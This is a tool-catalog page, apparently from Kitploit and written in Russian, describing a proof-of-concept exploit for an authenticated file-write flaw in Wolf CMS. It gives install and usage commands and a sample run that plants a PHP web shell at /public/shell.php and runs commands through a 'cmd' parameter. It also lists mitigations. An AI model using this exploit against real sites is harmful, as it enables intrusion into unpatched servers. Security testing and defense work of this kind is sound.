Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-67206 — PoC-эксплойт для Wolf CMS <= 0.8.3.1: выполняет аутентификацию в панели администратора, записывает произвольный PHP-файл в /public через FileManagerController и выполняет команды через веб-шелл. | Kitploit
Инструменты/GitHubGitHub/anirbala98/cve-2026-67206
ЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

PoC-эксплойт для Wolf CMS <= 0.8.3.1: выполняет аутентификацию в панели администратора, записывает произвольный PHP-файл в /public через FileManagerController и выполняет команды через веб-шелл.

Репозиторий
1320 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE через произвольную запись файлов

Этот репозиторий содержит Proof of Concept (PoC) эксплойт для CVE-2026-67206

Дисклеймер

Этот проект предоставлен только для образовательных целей и авторизованного тестирования безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.

Обзор

Уязвимость произвольной записи файлов существует в версиях Wolf CMS до 0.8.3.1 включительно. Она позволяет аутентифицированному злоумышленнику записывать вредоносные произвольные файлы в каталог /public корня веб-сервера через функции create_file() и save() в FileManagerController.php. Функция create_file() в FileManagerController.php не проверяет расширения файлов, что позволяет аутентифицированным злоумышленникам записывать вредоносные PHP-скрипты и получать привилегии удалённого выполнения кода.

Подробный разбор с анализом исходного кода и демонстрацией эксплойта можно найти в моём блоге на Medium.

Затронутая версия

Затронуты все версии Wolf CMS до 0.8.3.1 включительно. Репозиторий Wolf CMS был заархивирован 28 августа 2021 года и больше не поддерживается активно. На данный момент патчей для этой уязвимости не существует.

Требования

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0
  • Установка

    root@kitploit:~
    git clone https://github.com/anirbala98/CVE-2026-67206.git
    cd CVE-2026-67206/
    pip install -r requirements.txt
    

    Использование

    root@kitploit:~
    python exploit.py <base_url> -u <username> -p <password>
    python exploit.py http://127.0.0.1:8080/ -u admin -p admin
    

    Пример

    root@kitploit:~
    └─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
    [*] Logging in with provided credentials...
    [+] Login successful
    
    [*] Creating a file named shell.php...
    [+] File creation successful
    
    [*] Attempting to write payload to shell.php...
    [+] Payload written successfully!
    [+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
    [+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
    www-data
    

    Меры по смягчению

    • Проверяйте расширения файлов, создаваемых аутентифицированными пользователями, на основе белого списка
    • Запрещайте такие расширения, как .php, .phtml, .phar, .php5 и т. д., если в них нет необходимости
    • Запретите выполнение PHP в каталогах загрузки корня веб-сервера
    • По возможности сохраняйте создаваемые файлы на отдельном сервере, чтобы минимизировать последствия

    Ссылки

    • https://www.tenable.com/cve/CVE-2026-67206
    • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
    • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
    Скачать инструмент